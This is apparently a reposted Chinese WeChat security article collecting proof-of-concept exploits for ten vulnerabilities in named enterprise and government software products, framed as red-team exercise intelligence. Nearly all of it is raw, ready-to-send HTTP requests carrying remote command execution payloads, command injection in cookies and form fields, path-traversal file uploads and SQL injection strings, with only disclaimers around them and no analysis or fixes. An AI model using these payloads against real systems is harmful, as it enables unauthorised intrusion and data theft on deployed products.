免责声明
| 本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢! |
一、金万维云联应用系统接入平台RCE
GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
二、瑞斯康达-多业务智能网关-RCE
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: close
三、深信服下一代防火墙NGAF存在任意文件上传漏洞
POST /cgi-bin/login.cgi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeHost: 127.0.0.1Content-Type: Application/X-www-FormCookie: PHPSESSID=`$(echo 7258052001 > /fwlib/sys/virus/webui/svpn_html/502082888.txt)`;Content-Length: 111{"opr":"login", "data":{"user": "watchTowr" , "pwd": "watchTowr" , "vericode": "EINW" , "privacy_enable": "0"}}
四、拓尔思TRS媒资管理系统任意文件上传
POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTXConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36------WebKitFormBoundarySl8siBbmVicABvTXContent-Disposition: form-data; name="file";filename="%2e%2e%2fwebapps%2fmas%2fa%2etxt"Content-Type: application/octet-streamxxx------WebKitFormBoundarySl8siBbmVicABvTX--
五、JeePlus快速开发平台resetpassword存在SQL注入漏洞
/kjds2022/a/sys/user/resetPassword?mobile=18888888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1))%23六、F-logic DataCube3存在命令执行漏洞
1、获取accesstime
GET /admin/setting_photo.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate
POST /admin/config_time_sync.php HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 116Content-Type: application/x-www-form-urlencodedCookie: SESS_IDS=24ef0vbucnke26mtreijnfumveHost: x.x.x.xUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36accesstime=0.66992700 1710752870&execute=&ntp_enable=&ntp_server=127.0.0.1|id >aaa.txt|&ntp_retry_count=1
GET /admin/aaa.txt HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate
七、建文工程管理系统desktop.ashx存在SQL注入漏洞
POST /SysFrame4/Desktop.ashx HTTP/1.1Host:Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15account=1%27+AND+8607+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%288607%3D8607%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29-- RvNO&method=isChangePwd&pwd=
八、建文工程项目管理软件BusinessManger存在SQL注入漏洞
POST /AppInterface/Business/BusinessManger.ashx HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipConnection: closemethod=PrjType&content=%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%2898%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28121%29%2BCHAR%2874%29%2BCHAR%28104%29%2BCHAR%2885%29%2BCHAR%2870%29%2BCHAR%28120%29%2BCHAR%2890%29%2BCHAR%2865%29%2BCHAR%28116%29%2BCHAR%2868%29%2BCHAR%2899%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2875%29%2BCHAR%2875%29%2BCHAR%28109%29%2BCHAR%28117%29%2BCHAR%2881%29%2BCHAR%2897%29%2BCHAR%2884%29%2BCHAR%2870%29%2BCHAR%28118%29%2BCHAR%2874%29%2BCHAR%2890%29%2BCHAR%2880%29%2BCHAR%28101%29%2BCHAR%2868%29%2BCHAR%28119%29%2BCHAR%28113%29%2BCHAR%2885%29%2BCHAR%28122%29%2BCHAR%2875%29%2BCHAR%2878%29%2BCHAR%28112%29%2BCHAR%28115%29%2BCHAR%28103%29%2BCHAR%2866%29%2BCHAR%2868%29%2BCHAR%28105%29%2BCHAR%2873%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29--+tftC
九、用友GRP A++Cloud政府财务云selectGlaDatasourcePreview存在SQL注入漏洞
POST /gla/dataSource/selectGlaDatasourcePreview HTTP/1.1Host:User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 74exe_sql=SELECT%2011*11&pageNumber=1&pageSize=10&exe_param=11,1,11,1,11,1
十、华磊科技物流getOrderTrackingNumber存在sql注入漏洞
GET /getOrderTrackingNumber.htm?documentCode=1'and%0a1=user::integer-- HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: close
关注公众号:实战安全研究
原文始发于微信公众号(实战安全研究):【0day/1day】2024HW情报合集(六)附poc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论